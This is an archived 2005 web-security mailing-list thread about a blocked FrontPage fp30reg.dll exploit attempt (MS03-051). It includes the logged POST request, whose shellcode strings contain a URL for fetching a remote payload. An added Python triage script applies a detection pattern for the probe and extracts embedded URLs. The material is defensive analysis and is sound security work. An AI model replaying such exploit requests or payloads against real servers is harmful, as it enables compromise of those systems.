[WEB SECURITY] Frontpage Exploit - Strange POST Payload

Chris Weber chris at lookout.net
Tue Jun 21 14:15:52 EDT 2005


Not answering your questions specifically but this looks like an attempt to
exploit a pretty old vulnerability announced in MS03-051.

http://www.securiteam.com/windowsntfocus/6M00B0K8UE.html 



-----Original Message-----
From: Ryan Barnett [mailto:rcbarnett at gmail.com] 
Sent: Tuesday, June 21, 2005 7:20 AM
To: Web Security
Subject: [WEB SECURITY] Frontpage Exploit - Strange POST Payload

I received a Frontpage exploit
(http://www.osvdb.org/displayvuln.php?osvdb_id=2952&Lookup=Lookup)
attempt yesterday.  I get these types of probes all the time (as I am sure
most of you do as well).  I normally filter these requests as I am not using
Frontpage.  The reason that I took a look at this particular request log is
that it triggered a Shellcode sig in Snort.

Since there was some binary data in the request, I piped it through strings.
Here is the log entry -

========================================
Request: 66.161.76.150 - - [20/Jun/2005:23:31:11 --0400] "POST
/_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Host: 199.196.145.215
Transfer-Encoding: chunked
Content-Length: 1499
mod_security-message: Access denied with code 403. Pattern match
"/fp30reg\.dll" at THE_REQUEST
mod_security-action: 403
1499
Ehttp://10.10.2.2:191/lsd
080/lsd
,0F4
%**f

HTTP/1.1 403 Forbidden
========================================

What was interesting was the POST payload of the request, specifically the
URL - http://10.10.2.2:191/lsd.  Has anyone else seen this before?  Three
questions that I have when looking at this -

1) This appears to be an attempt to have my vulnerable server download
something from a remote website.  If this is so, why the use of the
non-routable IP address (10.10.X.X)?  My server wouldn't be able to get to
the attacker's site...

2) What about the use of port 191?  This port seems to be related to the
propero service (by Cliff Neuman).  Does anyone know of any trojans that use
this port?

3) I am assuming that "/lsd" URI is a file for some form of malware.

Let me know if you have any insight into this exploit attempt.

Thanks.

--
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor: Securing Apache
GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
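A small triage script for blocked requests like the one above, added here as an example and not part of the original thread or of mod_security: it applies the same `/fp30reg\.dll` pattern to the request line, mimics what `strings` recovered from the body, pulls out any embedded URL, and marks whether its host is a non-routable address. The sample request and its filler bytes are constructed, not the original log bytes.

```python
import re
import ipaddress

# Constructed sample modelled on the post's blocked request; filler bytes are assumed.
SAMPLE_REQUEST = (
    b"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"
    b"Host: 199.196.145.215\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Length: 1499\r\n\r\n"
    b"1499\r\n\x00\x01\x80\xffEhttp://10.10.2.2:191/lsd\x00\x8f\x01"
    b"080/lsd\x00,0F4\x00%**f\x00\r\n"
)

# The pattern mod_security matched in the post, applied here to the request line.
FRONTPAGE_PROBE = re.compile(rb"/fp30reg\.dll", re.IGNORECASE)
URL_RE = re.compile(rb"https?://([^\s/:\x00]+)(?::(\d+))?[^\s\x00]*")

def printable_strings(data, min_len=4):
    """Mimic `strings`: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}"
    return [m.decode("ascii") for m in re.findall(pattern, data)]

def is_private_host(host):
    """True for non-routable IP literals such as 10.10.2.2 (RFC 1918)."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:  # a hostname, not an IP literal
        return False

def triage(raw):
    """Summarise a blocked request: probe match, framing headers, body URLs."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    urls = []
    for m in URL_RE.finditer(body):
        host = m.group(1).decode("ascii", "replace")
        urls.append({"url": m.group(0).decode("ascii", "replace"), "host": host,
                     "port": int(m.group(2)) if m.group(2) else 80,
                     "private": is_private_host(host)})
    return {
        "request_line": request_line.decode("ascii", "replace"),
        "frontpage_probe": bool(FRONTPAGE_PROBE.search(request_line)),
        # Chunked plus Content-Length: the body length is ambiguous, worth flagging.
        "conflicting_framing": b"transfer-encoding" in headers and b"content-length" in headers,
        "strings": printable_strings(body),
        "urls": urls,
    }
```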

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/

